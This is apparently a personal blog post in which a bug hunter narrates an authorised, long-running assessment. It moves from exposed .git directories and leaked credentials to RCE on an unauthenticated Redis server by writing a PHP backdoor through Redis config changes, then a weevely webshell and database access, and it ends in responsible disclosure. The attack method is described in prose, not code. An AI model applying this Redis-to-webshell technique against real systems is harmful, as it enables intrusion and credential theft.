I would have bragged of an APT, but the characteristics depicted on this post strongly illustrates the persistence and neither advanced nor threat.
After this organization made a request for a bug hunt by a cyber security company I once worked for, I launched my terminal and took the challenge.
Did the usual enumeration, domain, IP scans, directory discovery, web application assessments. The results were not that impressive, just some low level directory listing flaw and perhaps a few unprotected .git directories.
Lost hope and just sent the findings due to pressure and time moving. Got frustrated by the minimal discovery. All my hopes didn't go away though, the organization agreed to keep the bug hunt open and limitless timeline.
Six months later, my psyche is revived once more. I decide to redo the whole enumeration from start. I soon discover more .git misconfigurations and a more critical directory listing through unrestricted access to apache server-status resource.
In the directory listing, I manage to find a couple of gems:- bash scripts with DB credentials, API keys and some Dockerfile and docker-compose.yml files also containing a couple of secrets.
For the misconfigured .git directory, I was able to discover the business logic by going through the harvested source code, configuration files containing even more DB credentials and above all a different domain owned by the organization, that's not anywhere in google. Deep OSINT is really important.
GIT is a type of content versioning systems, and there are others like subversion (svn). In a case of an exposed/misconfigured .git or .svn directories, an attacker is in a position to harvest all the source code and all the code commits and commit messages.
Armed with this info, I knew it wasn't enough for a persistent bug hunt. So I dug deeper. I tried using the credentials that I had retrieved in the above two sections, but none of them worked, they just timed out. This was an indication of a firewall rule that allowed just particular IPs to connect to these vital assets. At this point it was evident that if this info has to be valuable in terms of a bug hunt, then breaking into one of the white listed assets was the key to the kingdom.
The good thing is that I had another domain to continue my assessment. Months down the line, I reembarked on the mission. This time round I didn't start from the beginning as I had a saved cherrytree with all the previous findings.
Taking notes in an engagement is very important, you can pick up the operation at any time and continue saving you time to always start afresh. My go to tool for my note taking is obviously cherrytree.
Findings at this point was a lot of subdomains enumerated from the newly discovered domain ( larger attack surface) and more .git exposed directories containing even more critical secrets.
Most nmap scan results led to HTTP based services and inaccessible MQTT servers. One scan stood out though and found two extra services:- redis caching service and memcached service.

The Redis server was definitely an older version. So I quickly set it up in the workstation in my house. I used docker and now that there wasn't a docker image for redis 3.2.12, I decided to build one myself.
On using redis-cli -h <IP>, I quickly realize that the redis server was used to set a cron job that downloads, installs and runs a cryptominer that mines for monero. Using a few threat hunting techniques, I quickly learnt of the attacker and the technique they used to infect and inject cryptominers in exposed unauthenticated redis servers.

A subsequent article will contain a write up of all the techniques used to infect redis servers and lead to RCE.
In the back of my mind I was confident that this should lead to RCE, but I kept getting permission denied on attempting a couple of techniques to RCE the server's cron jobs.
The technique is simple, after connecting to the redis server using the redis-cli, you change the config directory, and put database to something like backdoor.php, then inject php backdoor code into the db, PHP is a lenient language and will ignore all the other redis garbage in the file and execute the php code. Boom, sounds like a plan, but the problem is that at this point I can't write to crontab file because redis has got limited privileges.
So I left it at that. Stayed for one or two more months. I pick up the mission again. This time round I checked on the other HTTP services that I had left initially on the same server that the redis services runs on.
GIT misconfiguration again, config.ini file, with full path to a log directory which discloses rull path to the webserver. This web service was critical as it was used to run a financial API endpoint. So I abuse this info and inject a php backdoor, and viola it works, RCE, I next generate a weevely webshell and I have a full terminal experience into my target.


Recalling back then, I had found some DB credentials that only allowed access to specific whitelisted IPs, I uploaded an adminer to the web server that I now have shell access, and successfully authenticated to a couple of databases.
Downloaded more projects from the server and soon realized that I was in the developer's subnet of the organization.
Did a responsible disclosure report and submitted the findings.
One and a half year of enumeration, frustration and pwnage. New skills learnt.
In the next article I'll get into the technicals of part of this post.
I'll talk about harvesting exposed .git directories, the different methods used to gain RCE on exposed unauthenticated redis servers and a tool presentation to automated the pwnage.
Stay tuned.